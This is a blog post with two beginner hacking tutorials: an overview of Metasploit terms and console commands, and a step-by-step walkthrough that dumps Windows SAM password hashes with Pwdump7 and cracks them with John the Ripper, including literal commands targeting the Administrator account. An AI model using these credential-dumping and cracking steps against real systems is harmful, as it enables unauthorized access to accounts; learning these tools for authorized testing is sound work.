SecurityHunk

If you have interest in hacking then I feel metasploit framework platfrom is very essential to know and implement.It is used by security reseachers,Pentesters,Hackers,script kiddes etc.So,in this tutorial I will discuss few basics of metasploit and its architecture.So lets start....

I recommend readers if they abide by the blog's Disclaimer then they can proceed reading this post otherwise leave this page immediately.

What is metasploit?

It is an exploitation framework written in ruby language used for devloping and executing exploits on a remote host after assessing the vulnerability.It has a wide range of pre developed exploits and few useful applications like "nmap" attached with it.It was primarily developed for penetration testing but now it has come out to be must needed tool for hackers.

Note:All the screen shots in this post are from Windows OS.

Architecture:

Image Credit:HD Moore

Basic Terms:

1.Exploits:
It is similar to a vehicle in real life that helps in entering or penetrating to a system because of any vulnerability or any flaw in the system.

2.Payload:
Its specifies the work of the exploit

3.Auxillary:
These are few other applications combined with the framework like sniffers,enumeration tool.

4.Meterpreter:
It is a payload that is injected into a process of an exploited system where no additional process is created in the memory and later it can be migrated to any desired process using PID(Process ID.)

5.Encoders:
Exploits are sometimes detected by anti-virus so these encoders can be used to make the exploits undetectable and manipulate the code.

6.Nops:
Known as no operation generators are helpful in letting the exploit remain undetected from IDS.


7.Plugins:
The extend the functionality of the cosole.

Basic Commands:

1.help:
As the name signifies it will show some commands for reference.

2.search:
If you want to search an exploit and donot know the excat name then.For example search windows as shown in the image below.

3.use:
After the desired exploit has been sorted out then use this command to select he particular exploit as shown in the image below.


4.set:
If you want to use a particular option once then this command is used as shown in the image below.

5.show options:
If this command is used then it will show the options of the exploit.What port to be used etc...

6.setg:
It is same as "set" but the "g" stands for global so if you want to use a particular option for the complete session then use this command.

7.show :
Only "show" command will display all the exploits,payload and auxillaries at a time on the screen but if used as "show payloads" etc will show only the payloads as shown in the image below.
 


8.info :
It displays the needed information about an exploit or payload.

9.exploit/run:
After every thing is set this command is used to run the exploit.

10.sessions:session -i,session -i <1,2,3...id>:
After the exploit is succesful then to see the sessions this command is used and then the ID is used to select a specific one.

11.ps:
Suppose a meterpreter session is running successfully then "Ps" will display the processes running in the exploited system.

12.migrate :
It somtimes happens that the process to which the meterpreter is being injected is a temporary process so here the migrate command can be used to tranfer the meterpreter to some other process by specifing the process id.

You can setup a "Pentesting Environment" at your home using Virtual environment,find out here.

For more information on Metasploit visit here.

In Microsoft Windows user account password and information are stored in a file called SAM. The windows SAM file location is “%systemroot%\system32\config” and also a backup copy of the file is also stored in ”%systemroot%\repair”.Here in this post we will see how to use John the Ripper for windows to extract the information.

As part of Windows 10 Password hack, we will be using brute force password cracker that is John the Ripper and Pwdump7.In this John the Ripper tutorial we will keep things simple for understanding and keeping in mind if any beginner is following it.

In Windows 10 and earlier versions till Windows SP3 the SAM file is by default locked with syskey enabled so we cannot open it as such and view its content so here in this post, I will show you how we can crack it and retrieve the hash.

You may be wondering what does SAM stand for?

It is can be expanded as Security Accounts Manager, it stores the user credentials information.

Requirements:

1. Pwdump7: (Download)

2.John the ripper Download

Procedure:

Step 1. You need to have the administrative privilege then open up command prompt window, using the command prompt go to the directory where pwdump7 is present and follow the on-screen information as shown below.

Step 2. After all the hashes are being displayed on the command prompt screen right click on the title bar copy it then pastes and saves it in a text file.First right click and mark the screen before copying. Here I have saved it as pw-hash.txt

Step 3.Having downloaded John the ripper for windows browse into John’s root directory and use the command as shown in the image below.

Step 4.The command we have used above is “C:\JOHN\RUN>john-386 C:/pw-hash.txt –users=Administrator”, the format of the command is “john-386 [Hash file path] –users=[Username]”.Here the hash file path is “C:/pw-hash.txt” and the username is “Administrator”, by using the above command then the John will search for the password of Administrator.

You can also use “C:\JOHN\RUN>john-386 C:/pw-hash.txt” so that John will search for the password of all the usernames available.

If you have a John the ripper wordlist then you can use the wordlist mode as well.

john --wordlist=password.txt pw-hash.txt

I think from this post we were able to understand how to use John the Ripper for windows Tutorial and Pwdump7 .

If you find this post useful then do drop a comment it will be appreciated.